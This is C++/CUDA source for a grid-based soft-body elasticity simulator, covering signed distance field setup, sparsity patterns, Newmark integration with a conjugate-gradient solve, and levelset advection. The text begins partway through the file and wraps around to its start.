for (int z = 1; z < size.z() - 1; ++z) for (int y = 1; y < size.y() - 1; ++y) for (int x = 1; x < size.x() - 1; ++x) { bool inner = true; for (int iz = z - 1; iz <= z + 1; ++iz) for (int iy = y - 1; iy <= y + 1; ++iy) for (int ix = x - 1; ix <= x + 1; ix++) { if (copy[input.referenceSdf_->toLinear(ix, iy, iz)] == +1) inner = false; } if (inner) { copy[input.referenceSdf_->toLinear(x, y, z)] = -1; } } input.referenceSdf_->getHostMemory() = copy; //Test / Validation for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { int numInside = 0; bool active = false; for (int i = 0; i < 8; ++i) { real val = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::insideEq(val)) numInside++; if (ar::utils::inside(val)) active = true; } if (numInside != 0 && numInside != 8 && active) { CI_LOG_E("If filledCells==true, each cell should be completely filled or completely empty, but the values are:" << " " << input.referenceSdf_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) << " " << input.referenceSdf_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) << " " << input.referenceSdf_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) << " " << input.referenceSdf_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) << " " << input.referenceSdf_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) << " " << input.referenceSdf_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) << " " << input.referenceSdf_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) << " " << input.referenceSdf_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z)); } } } input.referenceSdf_->copyHostToDevice(); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromFile(const InputSdfSettings & settings) { /* WorldGridPtr grid = std::make_shared<WorldGrid>(settings.voxelResolution, Eigen::Vector3i(settings.offset.x, settings.offset.y, settings.offset.z), Eigen::Vector3i(settings.size.x, settings.size.y, settings.size.z)); WorldGridRealDataPtr sdf = std::make_shared<WorldGridData<real>>(grid); sdf->allocateHostMemory(); std::ifstream i(settings.file, std::ios::in | std::ios::binary); i.seekg(sizeof(int) + 6 * sizeof(float)); std::vector<float> data(grid->getSize().prod()); i.read(reinterpret_cast<char*>(&data[0]), sizeof(float) * grid->getSize().prod()); i.close(); for (size_t j = 0; j < sdf->getHostMemory().size(); ++j) { sdf->getHostMemory()[j] = static_cast<real>(data[j]); } */ std::ifstream i(settings.file, std::ios::in | std::ios::binary); if (!i.is_open()) throw std::exception("Unable to open SDF file"); WorldGridRealDataPtr sdf = WorldGridData<real>::load(i); i.close(); return SoftBodyGrid3D::createFromSdf(settings, sdf); } //--------------------------------------------- // The actual instances: // They only store the settings for simple access // No logic is implemented here //--------------------------------------------- static int debugTimer = 0; SoftBodyGrid3D::SoftBodyGrid3D(const Input& input) : input_(input) , precomputed_(allocatePrecomputed(input)) , state_(allocateState(input)) { allocateTemporary(input); //fill statistics statistics_.numElements = input_.numActiveCells_; statistics_.numFreeNodes = input_.numActiveNodes_; statistics_.numEmptyNodes = input_.grid_->getSize().prod() - input_.numActiveNodes_; statistics_.avgEntriesPerRow = input_.sparsityPattern_.nnz / double(input_.sparsityPattern_.rows); reset(); } SoftBodyGrid3D::~SoftBodyGrid3D() { } void SoftBodyGrid3D::reset() { state_.displacements_.setZero(); state_.velocities_.setZero(); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); state_.advectedSDF_ = input_.referenceSdf_; state_.advectedBoundingBox_ = computeTransformedBoundingBox(input_, state_); state_.gridDisplacements_.setZero(); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); resetTimings(); debugTimer = 0; } void SoftBodyGrid3D::solve(bool dynamic, BackgroundWorker2* worker, bool advect) { resetTemporary(); CudaTimer timer; //1. Forces worker->setStatus("Grid: compute forces"); if (isRecordTimings()) timer.start(); forces_.inplace() = precomputed_.bodyForces_; if (settings_.enableCollision_) { applyCollisionForces(input_, settings_, state_, forces_); } if (isRecordTimings()) { timer.stop(); statistics_.collisionForcesTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; //2. stiffness matrix worker->setStatus("Grid: compute stiffness matrix"); if (isRecordTimings()) timer.start(); computeStiffnessMatrix(input_, state_, settings_, stiffness_, forces_); if (isRecordTimings()) { timer.stop(); statistics_.matrixAssembleTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; #if 0 //DEBUG Eigen::VectorXf forcesEigen = DebugUtils::vectorToEigen(forces_); Eigen::MatrixXf stiffnessEigen = DebugUtils::matrixToEigen(stiffness_); #if 1 cinder::app::console() << "Grid Force Vector:\n" << forcesEigen.transpose() << std::endl; //cinder::app::console() << "Grid Stiffness matrix:\n" << stiffnessEigen << std::endl; try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("StiffnessMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << stiffnessEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is stiffness matrix symmetric? " << (stiffnessEigen.isApprox(stiffnessEigen.transpose(), 1e-5))); int rank = stiffnessEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the stiffness matrix: " << rank << " of " << stiffnessEigen.rows()); if (rank < stiffnessEigen.rows()) { //check if there are empty rows / columns for (int i=0; i<stiffnessEigen.rows(); ++i) { if (stiffnessEigen.row(i).isZero(1e-5)) { CI_LOG_I("Row " << i << " is zero"); } } } #endif //3. Solve if (dynamic) { worker->setStatus("Grid: Newmark compute matrices"); CommonKernels::newmarkTimeIntegration( stiffness_, forces_, precomputed_.lumpedMass_, state_.displacements_, state_.velocities_, settings_.dampingAlpha_, settings_.dampingBeta_, settings_.timestep_, newmarkA_, newmarkB_, settings_.newmarkTheta_); #if 0 //DEBUG Eigen::VectorXf massEigen(input_.numActiveNodes_); precomputed_.lumpedMass_.copyToHost(massEigen.data()); Eigen::MatrixXf newmarkAEigen = DebugUtils::matrixToEigen(newmarkA_); Eigen::VectorXf newmarkBEigen = DebugUtils::vectorToEigen(newmarkB_); #if 1 try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("MassVector.dat", std::ofstream::out | std::ofstream::trunc); f << massEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkAEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkVector.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkBEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is the Newmark matrix symmetric? " << (newmarkAEigen.isApprox(newmarkAEigen.transpose(), 1e-5))); int rank = newmarkAEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the Newmark matrix: " << rank << " of " << newmarkAEigen.rows()); #endif //Testing #if MAKE_NEWMARK_SYMMETRIC==1 newmarkA_ = DebugUtils::makeSymmetric(newmarkA_); #endif worker->setStatus("Grid: CG solve"); Vector3X currentDisplacement = state_.displacements_ + make_real3(settings_.timestep_) * state_.velocities_; //initial guess int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(newmarkA_, newmarkB_, currentDisplacement, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } //Testing if (settings_.debugSaveMatrices_) { CI_LOG_E("save matrices"); DebugUtils::saveToMatlab(newmarkA_, "NewmarkA_" + std::to_string(debugTimer) + ".dat"); DebugUtils::saveToMatlab(newmarkB_, "NewmarkB_" + std::to_string(debugTimer) + ".dat"); } debugTimer++; worker->setStatus("Grid: Newmark compute velocity"); Vector3X currentVelocity(input_.numActiveNodes_); CommonKernels::newmarkComputeVelocity( state_.displacements_, state_.velocities_, currentDisplacement, currentVelocity, settings_.timestep_, settings_.newmarkTheta_); state_.displacements_.inplace() = currentDisplacement; state_.velocities_.inplace() = currentVelocity; } else { worker->setStatus("Grid: CG solve"); state_.displacements_.setZero(); int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(stiffness_, forces_, state_.displacements_, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } } #if 0 //DEBUG Eigen::VectorXf displacementsEigen = DebugUtils::vectorToEigen(state_.displacements_); cinder::app::console() << "Grid Solution Displacements:\n" << displacementsEigen.transpose() << std::endl; Eigen::VectorXf velocitiesEigen = DebugUtils::vectorToEigen(state_.velocities_); cinder::app::console() << "Grid Solution Velocities:\n" << velocitiesEigen.transpose() << std::endl; #endif if (advect) { //4. Advect the levelset //a) compute new bounding box and grid worker->setStatus("Grid: Compute new bounding box"); if (isRecordTimings()) timer.start(); auto newBox = computeTransformedBoundingBox(input_, state_); state_.advectedBoundingBox_ = limitBoundingBox(newBox, state_.advectedBoundingBox_); WorldGridPtr grid = createGridFromBoundingBox(state_.advectedBoundingBox_, input_.grid_->getVoxelResolution(), 3); if (isRecordTimings()) { timer.stop(); statistics_.gridBoundingBoxTime.push_back(timer.duration()); } //b) Diffuse displacements worker->setStatus("Grid: Diffuse Displacements"); if (isRecordTimings()) timer.start(); diffuseDisplacements(input_, state_, state_.gridDisplacements_, diffusionTmp1_, diffusionTmp2_); if (isRecordTimings()) { timer.stop(); statistics_.gridDiffusionTime.push_back(timer.duration()); } //c) Advect levelset worker->setStatus("Grid: Advect Levelset"); auto advectedSdf = std::make_shared<WorldGridData<real>>(grid); advectedSdf->allocateDeviceMemory(); if (isRecordTimings()) timer.start(); advectLevelset(input_, state_.gridDisplacements_, advectedSdf, AdvectionSettings()); if (isRecordTimings()) { timer.stop(); statistics_.gridAdvectionTime.push_back(timer.duration()); } state_.advectedSDF_ = advectedSdf; } worker->setStatus("Grid: done"); } void SoftBodyGrid3D::updateSettings() { precomputed_.bodyForces_.setZero(); precomputed_.lumpedMass_.setZero(); computeMassMatrix(input_, settings_, precomputed_.lumpedMass_); computeBodyForces(input_, settings_, precomputed_.bodyForces_); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); CI_LOG_I("Settings updated, mass matrix and body forces recomputed"); } void SoftBodyGrid3D::allocateTemporary(const Input& input) { forces_ = Vector3X(input.numActiveNodes_); stiffness_ = SMatrix3x3(input.sparsityPattern_); newmarkA_ = SMatrix3x3(input.sparsityPattern_); newmarkB_ = Vector3X(input.numActiveNodes_); const Eigen::Vector3i& size = input.grid_->getSize(); diffusionTmp1_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp2_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); } void SoftBodyGrid3D::resetTemporary() { forces_.setZero(); stiffness_.setZero(); } }
SoftBodyGrid3D.cu
#include "SoftBodyGrid3D.h" #include <cinder/app/AppBase.h> #include <cinder/CinderGlm.h> #include <Eigen/Dense> #include "Utils.h" #include "Integration3D.h" #include "CommonKernels.h" #include "DebugUtils.h" #include "CudaTimer.h" //For testing: set to 1 to enforce a symmetric matrix in the CG //If 0, small unsymmetries of a few ulps are in the matrix due to the ordering of the operations //If 1, the upper and lower triangular parts are averaged to create a numerically exact symmetric matrix #define MAKE_NEWMARK_SYMMETRIC 0 namespace ar3d { int3 SoftBodyGrid3D::offsets[8] = { make_int3(-1, -1, -1), make_int3(0, -1, -1), make_int3(-1, 0, -1), make_int3(0, 0, -1), make_int3(-1, -1, 0), make_int3(0, -1, 0), make_int3(-1, 0, 0), make_int3(0, 0, 0) }; void SoftBodyGrid3D::Input::assertSizes() const { assert(referenceSdf_->getGrid() == grid_); assert(posToIndex_->getGrid() == grid_); assert(numActiveCells_ > 0); assert(numActiveNodes_ > 0); assert(interpolationVolumeWeights_.rows() == numActiveCells_); assert(interpolationBoundaryWeights_.rows() == numActiveCells_); assert(surfaceNormals_.rows() == numActiveCells_); assert(dirichlet_.rows() == numActiveCells_); assert(mapping_.rows() == numActiveCells_); assert(referencePositions_.rows() == numActiveNodes_); //assert(sparsityPattern_.cols == numActiveNodes_); //assert(sparsityPattern_.rows == numActiveNodes_); } SoftBodyGrid3D::State SoftBodyGrid3D::State::deepClone() const { State s; s.displacements_ = displacements_.deepClone(); s.velocities_ = velocities_.deepClone(); s.advectedBoundingBox_ = advectedBoundingBox_; s.gridDisplacements_ = gridDisplacements_.deepClone(); if (advectedSDF_) { s.advectedSDF_ = std::make_shared<WorldGridData<real>>(advectedSDF_->getGrid()); s.advectedSDF_->setDeviceMemory(advectedSDF_->getDeviceMemory().deepClone()); } return s; } WorldGridPtr SoftBodyGrid3D::createGridFromBoundingBox( const ar::geom3d::AABBBox boundingBox, int resolution, int border) { Eigen::Vector3i offset = (boundingBox.min.array() * resolution).floor().cast<int>() - border; Eigen::Vector3i size = ((boundingBox.max - boundingBox.min).array() * resolution).ceil().cast<int>() + (2 * border); return std::make_shared<WorldGrid>(resolution, offset, size); } void SoftBodyGrid3D::setupInput1Grid(Input& input, real3 center, real3 halfsize, int resolution, int border) { Eigen::Vector3d bbmin(center.x - halfsize.x, center.y - halfsize.y, center.z - halfsize.z); Eigen::Vector3d bbmax(center.x + halfsize.x, center.y + halfsize.y, center.z + halfsize.z); input.grid_ = createGridFromBoundingBox(ar::geom3d::AABBBox(bbmin, bbmax), resolution, border); } void SoftBodyGrid3D::setupInput2Sdf(Input& input, std::function<real(real3)> posToSdf) { input.referenceSdf_ = std::make_shared<WorldGridData<real>>(input.grid_); input.referenceSdf_->allocateHostMemory(); const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { real3 pos = make_real3( (offset.x() + x) / real(input.grid_->getVoxelResolution()), (offset.y() + y) / real(input.grid_->getVoxelResolution()), (offset.z() + z) / real(input.grid_->getVoxelResolution()) ); input.referenceSdf_->atHost(x, y, z) = posToSdf(pos); } } void SoftBodyGrid3D::setupInput3Mapping(Input& input, int diffusionDistance) { bool noDiffusionLimit = diffusionDistance <= 0; const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveNodes = 0; int numDiffusedNodes = 0; int numInactiveNodes = 0; input.posToIndex_ = std::make_shared<WorldGridData<int>>(input.grid_); input.posToIndex_->allocateHostMemory(); input.posToIndex_->getHostMemory().setConstant(noDiffusionLimit ? -1 : -diffusionDistance-1); //Loop: active cells -> active nodes for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (active) for (int i=0; i<8; ++i) input.posToIndex_->atHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) = 1; } //Loop: for the inactive nodes, compute the minimal distance to the next active node in the Manhattan norm if (!noDiffusionLimit) { for (int i = 0; i <= diffusionDistance; ++i) { for (int z = 0; z < size.z(); ++z) for (int y = 0; y < size.y(); ++y) for (int x = 0; x < size.x(); ++x) { int idx = input.posToIndex_->atHost(x, y, z); if (idx > 0) continue; //active if (x > 0) idx = std::max(idx, input.posToIndex_->atHost(x - 1, y, z) - 1); if (y > 0) idx = std::max(idx, input.posToIndex_->atHost(x, y - 1, z) - 1); if (z > 0) idx = std::max(idx, input.posToIndex_->atHost(x, y, z - 1) - 1); if (x < size.x() - 1) idx = std::max(idx, input.posToIndex_->atHost(x + 1, y, z) - 1); if (y < size.y() - 1) idx = std::max(idx, input.posToIndex_->atHost(x, y + 1, z) - 1); if (z < size.z() - 1) idx = std::max(idx, input.posToIndex_->atHost(x, y, z + 1) - 1); if (idx == 0) idx = -1; //neighbor to active input.posToIndex_->atHost(x, y, z) = idx; } } } //Loop: mapping std::vector<real3> referencePositions; for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { int idx = input.posToIndex_->getHost(x, y, z); if (idx > 0) { //active nodes, participates in the elasticity simulation numActiveNodes++; input.posToIndex_->atHost(x, y, z) = numActiveNodes; referencePositions.push_back( make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) )); } else if (idx <= -diffusionDistance - 1 && !noDiffusionLimit) { //too far outside, not needed in the diffusion numInactiveNodes++; input.posToIndex_->atHost(x, y, z) = 0; //input.referenceSdf_->atHost(x, y, z) = std::numeric_limits<real>::infinity(); } else { //participates in the diffusion numDiffusedNodes++; input.posToIndex_->atHost(x, y, z) = -numDiffusedNodes; } } input.posToIndex_->copyHostToDevice(); input.numActiveNodes_ = numActiveNodes; input.numDiffusedNodes_ = numDiffusedNodes; input.referencePositions_ = Vector3X(numActiveNodes); input.referencePositions_.copyFromHost(referencePositions.data()); input.referenceSdf_->copyHostToDevice(); CI_LOG_I("num active nodes: " << numActiveNodes << ", num diffused nodes: " << numDiffusedNodes << ", num inactive nodes: " << numInactiveNodes); } void SoftBodyGrid3D::setupInput4CellData(Input& input, bool enableDirichlet, real3 dirichletCenter, real3 dirichletHalfsize, bool integralsSampled) { const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveCells = 0; std::vector<char> dirichlet; std::vector<int4> mapping; std::vector<real8> volumeWeights; std::vector<real8> surfaceWeights; std::vector<real3> surfaceNormals; std::vector<real8> cellSdfs; real3 dirichletMin = dirichletCenter - dirichletHalfsize; real3 dirichletMax = dirichletCenter + dirichletHalfsize; input.hasDirichlet_ = false; real3 centerOfMass = make_real3(0, 0, 0); real totalVolume = 0; for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; numActiveCells++; //mapping int4 map = make_int4( input.posToIndex_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) - 1, input.posToIndex_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) - 1, input.posToIndex_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) - 1, input.posToIndex_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) - 1 ); mapping.push_back(map); assert(map.x + 2 == input.posToIndex_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) && "Invariant '+x follows -x' violated"); assert(map.y + 2 == input.posToIndex_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) && "Invariant '+x follows -x' violated"); assert(map.z + 2 == input.posToIndex_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) && "Invariant '+x follows -x' violated"); assert(map.w + 2 == input.posToIndex_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z) && "Invariant '+x follows -x' violated"); //interpolation weights Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = static_cast<real>(input.grid_->getVoxelSize()); Integration3D::InterpolationWeight_t wx = integralsSampled ? Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegralLinear(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; totalVolume += volume; assert(volume > 0); volumeWeights.push_back(wx); auto sx = Integration3D::surfaceIntegral(interpPhi, h); surfaceWeights.push_back(sx); assert(isfinite(wx.first.x)); assert(isfinite(wx.first.y)); assert(isfinite(wx.first.z)); assert(isfinite(wx.first.w)); assert(isfinite(wx.second.x)); assert(isfinite(wx.second.y)); assert(isfinite(wx.second.z)); assert(isfinite(wx.second.w)); assert(isfinite(sx.first.x)); assert(isfinite(sx.first.y)); assert(isfinite(sx.first.z)); assert(isfinite(sx.first.w)); assert(isfinite(sx.second.x)); assert(isfinite(sx.second.y)); assert(isfinite(sx.second.z)); assert(isfinite(sx.second.w)); //cell SDF values cellSdfs.push_back(interpPhi); //normal float3 normal = make_float3( (values[1]+values[3]+values[5]+values[7])/4 - (values[0]+values[2]+values[4]+values[6])/4, (values[2]+values[3]+values[6]+values[7])/4 - (values[0]+values[1]+values[4]+values[5])/4, (values[4]+values[5]+values[6]+values[7])/4 - (values[0]+values[1]+values[2]+values[3])/4 ); normal = safeNormalize(normal); surfaceNormals.push_back(make_real4(normal.x, normal.y, normal.z, 0)); //dirichlet if (enableDirichlet) { real3 cellMin = make_real3( (offset.x() + x - 1) / real(resolution), (offset.y() + y - 1) / real(resolution), (offset.z() + z - 1) / real(resolution) ); real3 cellMax = make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) ); bool isDirichlet = all(cellMax >= dirichletMin) && all(dirichletMax >= cellMin); dirichlet.push_back(isDirichlet); if (isDirichlet) input.hasDirichlet_ = true; } else dirichlet.push_back(false); //center of mass real weights[] = { wx.first.x, wx.first.y, wx.first.z, wx.first.w, wx.second.x, wx.second.y, wx.second.z, wx.second.w }; for (int i = 0; i < 8; ++i) centerOfMass += weights[i] * make_real3( (offset.x() + x + offsets[i].x) / real(resolution), (offset.y() + y + offsets[i].y) / real(resolution), (offset.z() + z + offsets[i].z) / real(resolution)); } input.numActiveCells_ = numActiveCells; input.mapping_ = Vector4Xi(numActiveCells); input.mapping_.copyFromHost(mapping.data()); input.dirichlet_ = VectorXc(numActiveCells); input.dirichlet_.copyFromHost(dirichlet.data()); input.interpolationVolumeWeights_ = Vector8X(numActiveCells); input.interpolationVolumeWeights_.copyFromHost(volumeWeights.data()); input.interpolationBoundaryWeights_ = Vector8X(numActiveCells); input.interpolationBoundaryWeights_.copyFromHost(surfaceWeights.data()); input.surfaceNormals_ = Vector3X(numActiveCells); input.surfaceNormals_.copyFromHost(surfaceNormals.data()); input.cellSdfs_ = Vector8X(numActiveCells); input.cellSdfs_.copyFromHost(cellSdfs.data()); input.centerOfMass_ = centerOfMass / totalVolume; //find index of free nodes that is closest to the center of mass std::vector<real3> referencePositions(input.referencePositions_.size()); input.referencePositions_.copyToHost(&referencePositions[0]); input.centerOfMassIndex_ = 0; float minCoMDistance = FLT_MAX; for (int i=0; i<referencePositions.size(); ++i) { float d = lengthSquared3(referencePositions[i] - input.centerOfMass_); if (d < minCoMDistance) { minCoMDistance = d; input.centerOfMassIndex_ = i; } } CI_LOG_I("num active cells: " << numActiveCells); CI_LOG_I("center of mass: (" << input.centerOfMass_.x << "," << input.centerOfMass_.y << "," << input.centerOfMass_.z << ")"); CI_LOG_I("total volume: " << totalVolume); } void SoftBodyGrid3D::setupInput5SparsityPattern(Input& input) { typedef cuMat::SparsityPattern<cuMat::CSR> SPattern; SPattern pattern; pattern.rows = input.numActiveNodes_; pattern.cols = input.numActiveNodes_; //create entry set typedef std::pair<int, int> entry_t; std::set<entry_t> entries; const auto& size = input.grid_->getSize(); for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; int indices[8]; for (int i=0; i<8; ++i) { indices[i] = input.posToIndex_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) - 1; assert(indices[i] >= 0); } for (int i=0; i<8; ++i) for (int j=0; j<8; ++j) entries.insert(std::make_pair(indices[i], indices[j])); } SMatrix3x3::StorageIndex nnz = static_cast<SMatrix3x3::StorageIndex>(entries.size()); pattern.nnz = nnz; //allocate indices on the host std::vector<SMatrix3x3::StorageIndex> JA(pattern.rows + 1, 0); //outer std::vector<SMatrix3x3::StorageIndex> IA; IA.reserve(nnz); //inner //loop through all sorted entries and build indices entry_t lastEntry(-1,-1); for (const entry_t& e : entries) { //assert sorted assert(lastEntry.first < e.first || (lastEntry.first==e.first && lastEntry.second<e.second)); lastEntry = e; //increment outer index, add inner index JA[lastEntry.first + 1]++; IA.push_back(lastEntry.second); } assert(IA.size() == nnz); for (int i=0; i<pattern.rows; ++i) JA[i+1] += JA[i]; //prefix sum //copy to device pattern.JA = SPattern::IndexVector(pattern.rows + 1); pattern.JA.copyFromHost(JA.data()); pattern.IA = SPattern::IndexVector(nnz); pattern.IA.copyFromHost(IA.data()); CI_LOG_I("Sparsity pattern created, matrix size: " << pattern.rows << ", non-zeros: " << nnz << " (" << (100.0*nnz / pattern.rows / pattern.rows) << "%, avg " << (real(nnz)/pattern.rows) << " per row)"); pattern.assertValid(); input.sparsityPattern_ = pattern; } SoftBodyGrid3D::Precomputed SoftBodyGrid3D::allocatePrecomputed(const Input& input) { Precomputed p; p.lumpedMass_ = VectorX(input.numActiveNodes_); p.lumpedMass_.setZero(); p.bodyForces_ = Vector3X(input.numActiveNodes_); p.bodyForces_.setZero(); return p; } SoftBodyGrid3D::State SoftBodyGrid3D::allocateState(const Input& input) { State s; s.displacements_ = Vector3X(input.numActiveNodes_); s.displacements_.setZero(); s.velocities_ = Vector3X(input.numActiveNodes_); s.velocities_.setZero(); const auto& size = input.grid_->getSize(); s.gridDisplacements_ = WorldGridData<real3>::DeviceArray_t(size.x(), size.y(), size.z()); return s; } SoftBodyGrid3D::Input SoftBodyGrid3D::createBar(const InputBarSettings& settings) { Input input; setupInput1Grid(input, settings.center, settings.halfsize, settings.resolution); std::function<real(real3)> posToSdf = [&settings](real3 pos) { real val = 0; if (all(pos >= settings.center - settings.halfsize) && all(pos <= settings.center + settings.halfsize)) { val = -1e10; val = std::max(val, settings.center.x - settings.halfsize.x - pos.x); val = std::max(val, pos.x - settings.center.x - settings.halfsize.x); val = std::max(val, settings.center.y - settings.halfsize.y - pos.y); val = std::max(val, pos.y - settings.center.y - settings.halfsize.y); val = std::max(val, settings.center.z - settings.halfsize.z - pos.z); val = std::max(val, pos.z - settings.center.z - settings.halfsize.z); } else { real3 closestPoint = clamp(pos, settings.center - settings.halfsize, settings.center + settings.halfsize); val = length(closestPoint - pos); } if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createTorus(const InputTorusSettings& settings) { Input input; real3 halfsize; real3 orientation = make_real3(settings.orientation.x, settings.orientation.y, settings.orientation.z); halfsize.x = sqrt(1 - ar::square(dot3(orientation, make_real3(1, 0, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.y = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 1, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.z = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 0, 1)))) * settings.outerRadius + settings.innerRadius; halfsize.w = 0; setupInput1Grid(input, settings.center, halfsize, settings.resolution); glm::vec3 a(0, 0, 1); glm::vec3 b(settings.orientation.x, settings.orientation.y, settings.orientation.z); glm::vec3 v = glm::cross(b, a); float angle = acos(glm::dot(b, a) / (glm::length(b) * glm::length(a))); glm::mat4 rotmat = glm::rotate(angle, v); std::function<real(real3)> posToSdf = [&settings, rotmat](real3 pos) { real val = 0; pos -= settings.center; //move towards the center glm::vec4 pos4(pos.x, pos.y, pos.z, 1); pos4 = rotmat * pos4; //rotate val = ar::square(sqrt(pos4.x*pos4.x + pos4.y*pos4.y) - settings.outerRadius) + pos4.z*pos4.z - ar::square(settings.innerRadius); val *= settings.resolution; if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromSdf(const InputSdfSettings & settings, WorldGridRealDataPtr referenceSdf) { Input input; input.grid_ = referenceSdf->getGrid(); input.referenceSdf_ = referenceSdf; for (size_t j = 